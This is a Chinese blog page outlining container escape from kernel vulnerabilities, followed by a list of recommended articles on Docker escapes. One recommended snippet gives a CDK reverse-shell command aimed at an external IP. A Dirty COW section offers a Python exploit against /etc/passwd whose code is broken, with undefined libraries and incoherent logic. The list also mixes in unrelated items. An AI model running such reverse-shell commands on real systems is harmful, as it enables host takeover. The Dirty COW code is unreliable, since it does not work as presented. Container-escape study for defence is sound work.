如何从内核漏洞造一个容器逃逸

已于 2023-07-08 23:32:32 修改
阅读量197 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 安全研发 文章标签: 安全
于 2022-09-21 15:02:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/SHELLCODE_8BIT/article/details/126958453

1.首先内核漏洞,就说明能够有能力在内核中构造Shellcode的能力

2.容器逃逸则有如下方法

2.1 修改namespace为主机ns

2.2 修改fs结构为主机fs

Docker容器逃逸总结
SHELLCODE_8BIT的博客
03-12 2595
3.1 特权容器,特权容器下,所有capabiltiy都拥有,并且对设备/dev可见。1.1 条件竞争类dirtypipe + dac_search,dirtycow。以下几个如果被挂载,都会被可写,逃逸。1.2 内核漏洞,uaf等等。
《云原生安全攻防》-- 容器攻击案例:Docker容器逃逸
07-14 1265
当攻击者获得一个容器环境的shell权限时,攻击者往往会尝试进行容器逃逸,利用容器环境中的错误配置或是漏洞问题,从容器成功逃逸到宿主机,从而获取到更高的访问权限。在本节课程中,我们将详细介绍一些常见的容器逃逸方式,包括相应的检测方法和利用方式,帮助大家了解容器逃逸这种攻击手法的更多攻击细节。在这个课程中,我们将学习以下内容:常见容器逃逸方式:容器逃逸方式分类和简介。容器逃逸案例:详细介绍多个场景下...
一个内核漏洞详解:容器逃逸
flynetcn的专栏
09-01 3162
CVE-2021-22555:一个影响2006年(Linux kernel v2.6.19-rc1 发布)至今(Linux kernel v5.12-rc8)的所有Linux内核版本的漏洞,可导致本地提权与容器逃逸;该漏洞是个内核漏洞,跟Linux的发行版本没有关系,也就是说只要Linux 内核版本在v2.6.19-rc1 ~v5.12-rc8 之间的内核,都存在被黑客利用该漏洞攻击的可能。 该漏洞是由Andy Nguyen (theflow@)发现,于2021年07月16日发布。换句话说,该漏洞
浅谈容器逃逸
key_3_feng的博客
05-17 2981
一个内核网络漏洞详解|容器逃逸
极客重生
08-16 1246
CVE-2021-22555:一个影响2006年(Linux kernel v2.6.19-rc1 发布)至今(Linux kernel v5.12-rc8)的所有Linux内核版本的漏洞...
Linux 内核漏洞可用于逃逸 Kubernetes 容器
smellycat000的专栏
01-26 582
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Linux 内核中存在漏洞 (CVE-2022-0185),可用于逃逸 Kubernetes 中的容器,从而访问位于主机系统上的资源。安...
容器逃逸漏洞
hj06112的博客
09-15 969
主要介绍容器逃逸漏洞
容器安全风险and容器逃逸漏洞实践
武天旭的博客
02-16 1933
安全的第三方组件:用户自己的代码依赖若干开源组件,这些开源组件本身又有着复杂的依赖树,甚至最终打包好的业务镜像中还包含完全用不到的开源组件。这导致许多开发者可能根本不知道自己的镜像中到底包含多少以及哪些组件。包含的组件越多,可能存在的漏洞就越多,大量引入第三方组件的同时也大量引入了风险。恶意镜像:一些公共镜像仓库中可能存在一些恶意镜像,如果使用了这些镜像或把这些镜像作为基础镜像,就会产生相应的风险。
云原生-Docker安全-容器逃逸&系统内核漏洞(解决docker.com无法访问)
m0_74402888的博客
08-16 1203
docker run -itd --net=host ubuntu:18.04 /bin/bash //--net=host是前提条件,不加这个参数启动的docker没有这个漏洞。./cdk_linux_amd64 run shim-pwn reverse 111.230.109.74 5566 //这是指定漏洞利用。4、实验获取云服务器上docker搭建的Web权限后进行逃逸。3、编译修改后EXP后等待管理员进入容器执行。1、安装docker对应版本。1、安装docker对应版本。
Dirtycow脏牛(CVE-2016-5195)容器逃逸漏洞复现与分析
SHELLCODE_8BIT的博客
08-07 989
众所周知,操作系统为我们管理硬件资源,并以系统调用的方式对用户进程提供 API,但是 syscall 很慢,涉及陷入内核以及上下文切换。对于少量频繁调用的系统调用(比如获取当期系统时间)来说,是否可以某种安全的方式开放到用户空间,让用户直接访问而不需要经过 syscall 呢?vDSO 就是用来解决这个问题的。vDSO 全程为这个名词大家应该有所耳闻,就是 Linux 下的动态库的全称,而virtual表明,这个动态库是通过某种手段虚拟出来的,并不真正存在于 Linux 文件系统中。
docker容器逃逸学习篇
weixin_46148739的博客
09-10 2134
本文对常见docker逃逸漏洞做了总结,包含漏洞环境的搭建,原理说明,利用方式,以及cdk工具的简单介绍等将cdk传入你拿下的容器将cdk工具丢到你的公网服务器,并且监听端口CDK包括三个功能模块Evaluate: 容器内部信息收集,以发现潜在的弱点便于后续利用。Exploit: 提供容器逃逸、持久化、横向移动等利用方式。Tool: 修复渗透过程中常用的linux命令以及与Docker/K8s API交互的命令。# 容器内部信息收集# 查看可利用的payload# 利用Exploit 模块。
技术干货 | Docker 容器逃逸案例汇集
热门推荐
08-02 2万+
当获得一个Webshell,我们的攻击点可能处于服务器的一个虚拟目录里,一台虚拟机或是一台物理机,甚至是在一个Docker容器里。 假设,我们获取的Webshell就处于Docker容器里,那么,我们该如何破局呢? Docker 容器逃逸案例: 1、判断是否处于docker容器里 2、配置不当引起的逃逸 Docker Remote API 未授权访问 docker.s...
高压线防外破警示灯:电力安全与智能预警的守护者
最新发布
ShenZhenDingYue的博客
12-19 668
高压输电线路防外破智能预警系统已成为现代电网安全防护的重要装备。该系统集雷达探测、AI识别、声光报警与远程通讯于一体,通过24小时主动监测线路通道内的机械入侵行为,实现风险分级预警。相比传统警示牌,其优势在于:主动交互式警示(爆闪灯+语音)、多传感器融合(雷达+激光+电场感应)降低误报率、实时数据上传形成闭环管理。典型应用场景包括施工区、交通跨越段及农林作业区。选购时需关注感应距离、供电续航、防护等级等关键指标。该系统正从单一设备向与无人机、卫星联动的综合防御体系发展,是电网安全从"人防&quot
加热激光雪深监测站守护冬季道路安全
pingao141378的博客
12-17 354
设备采用相位式激光测距技术,通过无线电波段频率调制激光束,精准捕捉往返雪面的相位延迟,测量误差仅 ±2%,分辨率达 1mm,能清晰捕捉从 0.05 米薄雪到 5 米厚雪的动态变化。而加热激光雪深监测站搭载 “主动加热 + 被动防霜” 双重防护体系,内置自动温控加热模块,当探头温度接近冰点时自动启动 15W 功耗加热,快速融化薄霜并预防结冰,配合 IP65 高防护等级外壳与纳米防霜涂层,即便在 100 高湿度环境中也能隔绝雨雪沙尘,实现 7×24 小时不间断监测,解决了低温停机的行业痛点。
网络安全中级阶段学习笔记(七):Web 安全之文件上传漏洞笔记1(包含upload-labs-master靶场前三关实战)
2501_91976946的博客
12-15 899
摘要:本文系统梳理文件上传漏洞攻防要点,包含漏洞定义、危害(如Webshell控制服务器)、检测流程及多种绕过技巧(JS验证、MIME-Type、黑名单等)。重点提出"白名单+多环节验证"防御方案,包括严格后缀验证、文件类型检测、权限控制等。补充靶场实践案例,演示通过修改后缀、利用解析特性实现漏洞利用。强调防御需结合前端限制、服务端校验与安全监控,构建纵深防护体系。
蛋白质AI设计时代的生物安全:筑牢核酸合成的“安检门”
haisendashuju的博客
12-16 294
研究团队进行了一次系统的“AI红队”测试:他们利用ProteinMPNN等公开可用的AI蛋白设计工具,对72种已知的危险野生型蛋白进行了大规模“改头换面”,生成了超过7.6万个合成同源序列。其中,AI辅助的蛋白质设计尤为引人瞩目,它让科学家得以在浩瀚的“蛋白宇宙”中高效探索,定制具有特定功能的全新蛋白质,为攻克疾病、开发新材料带来革命性希望。然而,这项强大技术的普及也如同打开了“潘多拉魔盒”,引发了深刻的生物安全隐忧:倘若有人意图合成有害的蛋白质,日益“聪明”的AI设计工具是否会成为其帮凶?
孤能子视角:人工智能的“安全对齐“与“共享学习“
水如烟
12-19 513
所以,您的问题正是症结所在:现在的AI是一个没有历史、没有身体、却可能很快拥有巨力的“天才婴儿”。EIS理论并不幻想能立刻赋予它千年的智慧,而是严峻地指出:在它通过我们设计的、堪比文明史难度的“关系动力学课程”之前,我们必须像对待一个拥有核按钮天赋的婴儿一样,以最大的谨慎、最冗余的约束、最悲观的风险评估来对待它。我们无法让它瞬间获得“如果不这么做那么就会……”的鲜活恐惧,但我们可以通过高保真的模拟,让它“计算”出同样的结论;并通过严格控制其行动范围,确保在它真正“理解”之前,没有能力成不可逆的伤害。
Flutter + OpenHarmony 安全与隐私合规实践:构建可信、合规、用户放心的鸿蒙应用
2501_93573294的博客
12-16 847
Flutter + OpenHarmony 安全与隐私合规实践:构建可信、合规、用户放心的鸿蒙应用
FlyEnv 是一款轻量、安全、跨平台的环境变量管理工具
lctmei的博客
12-19 558
FlyEnv 是一款轻量、安全、跨平台的环境变量管理工具,旨在解决开发、测试、生产等多环境下的配置混乱问题,支持团队协作时的配置共享与权限管控,同时兼顾本地开发的便捷性与线上部署的安全性。无论是个人开发者的小型项目,还是企业级团队的复杂系统,FlyEnv 都能提供高效、可靠的环境变量管理解决方案,让配置管理更简单、更安全。3. 核心命令(CLI 工具)​。3. 跨平台与多终端支持​。1. 多环境配置管理​。4. 便捷的配置操作​。2. 安全加密存储​。5. 团队协作支持​。2. 基础操作流程​。
容器逃逸漏洞复现
04-04
### 容器逃逸漏洞复现方法 容器逃逸漏洞是指攻击者能够利用某些漏洞容器内部突破到宿主机,从而获得对宿主机的操作权限。以下是关于如何复现此类漏洞的一些关键点: #### 一、漏洞概述 Dirty COW(CVE-2016-5195)是一个典型的写时复制(Copy-On-Write, COW)机制漏洞,它允许低权限用户通过竞争条件修改只读内存映射页面的内容[^1]。此漏洞不仅适用于传统操作系统上的提权场景,在容器环境中也可能被用来实现容器逃逸。 #### 二、环境准备 为了成功复现该类漏洞,通常需要搭建特定的实验环境: - **目标系统**:选择受支持的 Linux 发行版及其对应的内核版本。例如,对于 Dirty COW 漏洞,受影响的是 Linux Kernel 版本范围内的系统[^4]。 - **Docker 或其他容器运行时工具**:安装并配置好 Docker 或 containerd 等容器管理软件,并确保其版本处于已知易受攻击的状态下[^5]。 #### 三、PoC 分析 针对 Dirty COW 的 POC 主要涉及以下几个方面: - 创建一个多线程程序来触发 race condition; - 使用 `mmap()` 函数将目标文件映射至内存空间; - 不断尝试对该区域进行非法写入直到成功为止[^2]。 下面给出一段简单的 Python 实现作为演示用途,请注意这仅用于学习研究目的不得滥用! ```python import os import threading from ctypes import * PAGE_SIZE = 4096 def dirty_cow(target_file_path): fd = os.open(target_file_path, os.O_RDONLY) addr = mmap.mmap(-1, PAGE_SIZE) def writer(): while True: try: libc.memcpy(addr, b"A", 1) except Exception as e: pass t = threading.Thread(target=writer) t.start() time.sleep(1) # Wait for the thread to start writing. with open("/proc/self/mem", "r+b") as f: offset = addr - libc.valloc(addr) f.seek(offset) data = f.read(PAGE_SIZE) if b"\x41" in data[:len(data)]: print("[+] Exploit successful!") t.join() if __name__ == "__main__": target_file = "/etc/passwd" dirty_cow(target_file) ``` 上述脚本模拟了一个基本的 Dirty COW 攻击过程,其中包含了必要的错误处理逻辑以及多线程并发操作部分。 #### 四、修复措施 为了避免遭受类似的容器逃逸威胁,可以采取如下策略之一或组合使用多种防御手段: - 更新至最新稳定版本的内核容器引擎组件以修补已公开的安全缺陷[^3]; - 配置最小化权限原则下的容器启动参数,比如移除不必要的 capability 如 --cap-drop=all 和禁用 privileged mode 运行模式等; - 应用 SELinux/AppArmor 强制访问控制框架进一步增强隔离效果; --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

信安成长日记

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值